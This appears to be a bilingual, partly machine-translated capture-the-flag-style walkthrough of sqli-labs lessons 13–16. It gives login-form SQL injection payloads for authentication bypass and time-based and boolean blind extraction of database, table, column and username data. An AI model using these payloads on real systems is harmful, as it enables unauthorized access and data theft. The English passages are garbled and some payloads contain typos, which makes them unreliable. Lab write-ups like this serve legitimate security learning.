LESS13
by trying, we found that 12 off 13 that echoed off did not like, only landing success display.
12 echo off
13 off a successful login prompt
Followed by a burp or get a packet, this time I will not demonstrate.
uname = admin '& passwd = admin & submit = Submit
Next we constructed implantation statement
Through these types of determining parameter format
'
')
')) "
") "))
Input: uname = n ') or 1 = 1 # & passwd = admin & submit = Submit we can see that the landing was successful (I will not tested) format is the second
Next we columns by guessing
Input: uname = n ') order by 2 # & passwd = admin & submit = Submit
Because there is no echo, we consider the use of Boolean blind or blind time.
Input: uname = n ') or if (length (database ()) = 8,1, sleep (5)) # & passwd = admin & submit = Submit
this statement if the use and length function foregoing article have talked about how to use.
To judge the length of the database name. If the database name length is eight loaded quickly, otherwise the load can change 5s> <judgment method by 2 points, and here I direct the demo, do not waste time on.
You can see the name of the database to determine the success of the return time according to a length of 8
接下来我们使用left函数猜测数据库名字具体为什么。
输入:uname=n') or left(database(),1)='a'#&passwd=admin&submit=Submit
这里我猜测第一个字母为a 显示失败 我们可以更改数字1 来猜测不同位置的字母。
剩下我就省略了 数据库名字为 security
注意: 我们可以不用= 也可以用 > 例如我们猜测>a 如果返回1 则第一个字母比a 大 就是a 后面的字母
查表:
输入:uname=n') or left((select table_name from information_schema.tables where table_schema= 'security' limit 0,1),1)='e'#&passwd=admin&submit=Submit
在mysql 命令行中我们进入security中第一个表就是emails 所以猜测显示成功。
这种方法就是比较慢。推荐使用burp暴力破解。
通过burp抓包发送到暴力破解模块,清除后 然后选中a 包裹添加,开始暴力破解。
开始暴力破解、 通过返回数据长度即可判断正确的数据
LESS14
14关和13关完全相同,只是数据包裹的格式变为“”,步骤完全相同,参考上面
LESS15
15关也和前两关相同,只是数据包裹的格式变为‘’,步骤完全相同,参考上面
这写下步骤代码(其实和上面一样):
1. uname=admin&passwd=a“&submit=Submit 构造:1‘ or 1=1# 在这里判断列数没有实际意义了
2. uname=adminadmin&passwd=admiand' or if(length(database())>1000,1,sleep(5))#&submit=Submit通过这个来判断其长度
3. uname=adminadmin&passwd=admiand' or if(length()>1000,1,sleep(5))#&submit=Submit
4. uname=adminadmin&passwd=admiand‘ or left((select table_name from information_schema.tables where table_schema=’security‘ limit 0,1),1)>’a‘#&submit=Submit 使用和less-13相同的方法进行判断,就可以判断出当前security库的第一个表的第一个字母是否大于a
5. uname=adminadmin&passwd=admiand‘ or left((select column_name from information_schema.columns where table_name=’users‘ limit 0,1),1)>’g‘#&submit=Submit 通过同样的方法可以判断users表中的字段数据是否大于g
6. uname=adminadmin&passwd=admiand‘ or left((select username from security.users limit 0,1),1)> ’a‘#&submit=Submit通过这个来判断security.users下的username下第一个字段的第一位,在这里不能直接使用select username,password来一起查询,需要一个个进行查询
LESS16
16关也和前两关相同,只是数据包裹的格式变为(“”),步骤完全相同,参考上面